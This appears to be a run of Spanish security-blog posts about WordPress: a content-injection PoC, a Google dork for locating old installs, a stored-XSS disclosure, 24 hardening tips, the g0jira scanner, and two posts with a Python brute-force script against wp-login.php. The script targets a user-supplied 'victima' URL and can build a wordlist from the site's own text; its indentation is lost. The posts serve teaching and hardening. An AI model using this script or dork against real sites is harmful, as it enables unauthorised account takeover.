Inyección de Contenido en WordPress 4.7.2

Hoy es Domingo y Kazukun nos trae una buena sorpresa, una PoC de lo fácil que seria vulnerar un Wordpress con el conociendo la versión de la página a la que vamos a atacar y teniendo el exploit correspondiente.

Para más información os recomiendo ver la fuente de este vídeo y sobretodo entender el como funciona esta vulnerabilidad:

• https://blog.sucuri.net/espanol/2017/02/vulnerabilidad-de-inyeccion-de-contenido-en-wordpress.html

Sed Buenos ;)

¿Ya Actualizas tu Wordpress? Google Sabe Que No

Si, esta es otra de la gran mayoría de entradas que os repiten por activa y por pasiva que actualicéis vuestros sistemas y mas si es el caso de un servidor en el que alojamos una pagina web o blog para que el todo el mundo lo vea y los buscadores lo indexen. 

Hoy le toca el turno a Wordpress y no es por que le tengamos manía, sino es que el equipo del Flu project demostró en su blog que no la siguiente búsqueda se podía encontrar un montón de Wordpress y sus versiones.

• inurl:"readme.html" ext:html intitle:wordpress

Mucha mas información:

• http://www.flu-project.com/2016/01/wordpress-del-pleistoceno-vulnerables.html

 Así que si nos damos una vuelta y buscamos por wordpress y una de esas versiones en una pagina dedicada a las vulnerabilidades, encontraremos que para la ver 3.4.1  hay un total de 17 vulnerabilidades.

• http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/version_id-134490/Wordpress-Wordpress-3.4.1.html

Así que mas vale actualizar antes que morir.

Sed Buenos ;)

Wordpress 0'day XSS Stored

Hace unos días que llevo viendo bastantes vulnerabilidades que afectaban a Wordpress. La verdad es que no me sorprende demasiado que le estén dado caña a este motor web. Pero, lo que mas me llama la atención que aun queden vulnerabilidades tan bestias como esta después de 14 meses.

Juoko Pynnonen de Klikki Oy informó de un nuevo y cross-site scripting vulnerabilidad sin parchear almacenado en la plataforma; un error similar fue parcheado esta semana por los desarrolladores de WordPress, pero sólo 14 meses después de que se informó. 

Aquí os dejo el vídeo donde podéis ver todo el disclousure de este XSS reportado hace un año y dos mese que gracias a dios ya ha sido parcheado por Wordpress por que si llegamos a esperar mas...

Si queréis mucha mas información sobre este fallo: 

• https://threatpost.com/details-on-wordpress-zero-day-disclosed/112435?hootPostID=9cd86becbaa18c73d7b77a1a141e1f38

Sed Buenos con esto 0;) 

Tips De Seguridad Para WordPress.

Hoy me ha encantado toparme de cara con unos consejos/Tips de Seguridad para toda la gente que tenemos o hemos tenido un WordPress y no hemos sabido bien como gestionarlo o defenderlo de una manera que no nos dedicara mucho tiempo. Así que os dejo estos 24 tips. 

1. Manten tu blog en un subdominio.

2. Mueve el directorio wp-content.

3. No utilices el nombre de usuario 'admin'.

4. Mantener instalaciones de plugin a un mínimo.

5. Mueve el archivo de un directorio wp-config.php para arriba, fuera del directorio raíz web.

6. Apagua listado del directorio en tu servidor web.

7. Asegurar que los archivos TimThumb están al día.

8. Usar un plugin de entrada de bloqueo.

9. Extraer el archivo readme.html.

10. Manten el WordPress y sus plugins actualizados.

11. Administración a través de SSL. (Porfa Please)

12. Uso de un usuario sin privilegios de base de datos para la funcionalidad que no sea administrador. (Necesita alguna modificación WP)

13. No utilices el prefijo de tabla por defecto 'wp_'.

14. Mantener a los usuarios privilegiados al mínimo.

15. Quitar el número de versión de las etiquetas de generador (página índice y RSS).

16. Añadir una capa de protección al directorio wp-admin y el archivo wp-login.php con la autenticación básica HTTP.

17 Desactivar el editor de temas y plugins.

18 Utilice sólo los plugins del directorio oficial.

19. No guarde copias de seguridad en las guías públicas.

20. Remove 'Powered by WordPress "de pie de página del blog.

21. Habilitar X-Frame-Options para los usuarios no autenticados.

22. IP lista blanca el archivo wp-login.php.

23. Utiliza una contraseña segura

24. Revisa las cabeceras enviadas por el servidor web

Si quieres saber el porqué te recomiendo que leas la fuente de estos Tips/consejos que seguro que te gustaran. Os la dejo aquí abajo.  

• https://github.com/wpscanteam/wpscan/wiki/WordPress-Security-Tips

Sed Buenos ;) 

Programar y Hackear [5].- Una Aproximación A Un Advance Brute Force WordPress

Como ayer os [prometí], hoy me he estado gran parte de esta mañana intentando mejorar el Simple Brute Force para WordPress. Que aunque ponga WordPress en el titulo de la entrada es extrapolable a otras paginas con sistemas de login parecidos. Esto es una aproximación que he hecho con el tiempo que he podido por lo que, no funciona bien pero es un avance y me sirve para explicaros lo que en realidad quiero hacer con este script. 

Si os fijáis en el código de abajo, le he agregado una segunda opción y lo he arreglado un poco para que sea mas claro y no estorbe el código. En una de ellas he respetado el codigo original cambiando solo una variable mientras que en la otra he usado la magia de "split()" para separar strings, guardarlos en una lista para usarlos luego como passwords para el ataque. 

import mechanize
import urllib

def ataque(passwords):
usuario = raw_input("Usuario: ")
for password in passwords: 

r = br.open(url2)
br.select_form(nr=0)
br.form["log"] = usuario
br.form["pwd"] = password
br.submit()
respuesta = br.response().geturl()

if respuesta == url + "/wp-admin/":
print usuario + " : " + password + "--> Si"
else:
print usuario + " : " + password + "--> No" 

br = mechanize.Browser()
url = raw_input("URL http://victima.com: ")
url2 = url + "/wp-login.php"

d1 =  raw_input("[a= usar tu propio dicionario] [b= hacer uno con strings de la pagina]: ")

if d1 == "a": 

archivo = open('lista.txt', 'r')
diccionario = archivo.readlines()
ataque(diccionario)

elif d1 == "b":

busqueda = urllib.urlopen(url).read()
datos= busqueda.split()
d3 = str(datos)
diccionario2 = open('Strings.txt', 'a+')
diccionario2.writelines(d3)
ataque(diccionario2)

else: 
print "solo entiende a o b ..."

Espero que os guste y iremos mejorando este script a medida que pase el tiempo hasta que podamos limar estos slipts hasta convertirlos solamente en palabras para usarlos como contraseña. Ya que Wordpress no limita un ataque de fuerza bruta.

Sed Buenos con esto ;)

Programar y Hackear [4].- Simple Brute Force WordPress

El script, en python of course, del que os voy a hablar hoy viene de la mano de la gente de [websec.es] y es que quiero que veáis lo fácil que es intentar hackear algo, en este caso un wordpress, si sabemos programar, entender y modificar a nuestra manera los scripts que hay colgados en la red. 

En el caso de python y demás lenguajes de programación interpretados, hacer funcionar un script será tan fácil como copiar todo el código en nuestro editor y guardarlo como .py a no ser que dependa de librerías especificas que si que tendremos que instalar. En el caso del siguiente código, depende de la librería [Mechanize] la cual,  nos permitirá rellenar campos de una web. 

• Así que,  abrimos la consola y escribimos pip install mechanize y luego ejecutamos el siguiente código. 

Mas información sobre este script totalmente detallada en: 

• http://www.websec.es/2014/04/01/simple-brute-force-wordpress-python/

Pero en plena vorágine de herramientas para demoler la seguridad de Wordpress como [g0jira] un Brute Force sencillo sabe a poco. Así que, para mañana prometo traeros una versión mejorada de este script para que veáis que aprender Python no es ninguna tontería.  Pero, de momento podéis instalaros el modulo, copiaros el código en vuestro editor de código favorito y teniendo a mano una lista de contraseñas, probarlo. 

Sed Buenos con esto ;)  y aprended mucho mas.  

g0jira.- Pwning Wordpress

Mientras el [pucherazo de ayer] aun está vivo (ya sabéis que vosotros decidís si darme vacaciones o ayudarme) @TheXC3LL un compañero del blog [Estación Informática] a presentado su herramienta para "testear la seguridad de nuestro wordpress" a través de diversas vulnerabilidades. Está programada en PERL y aunque no está completada tiene muy buena pinta. 

"¿Qué es g0jira? Es un -intento de- framework/herramienta/llámalo X para escanear y explotar vulnerabilidades conocidas en WordPress y sus plugins. WPScan es sin duda una herramienta completa y que cumple bien sus funciones, pero odio depender de las herramientas de terceros cuando se trata de cosas sencillas de implementar. Es por ello que empecé a codear esta herramienta."

Podéis descargarla de aquí:

• https://github.com/0verl0ad/g0jira

Muchísima mas información:

• http://www.estacion-informatica.com/2014/07/g0jira-herramienta-para-pwnear-wordpress.html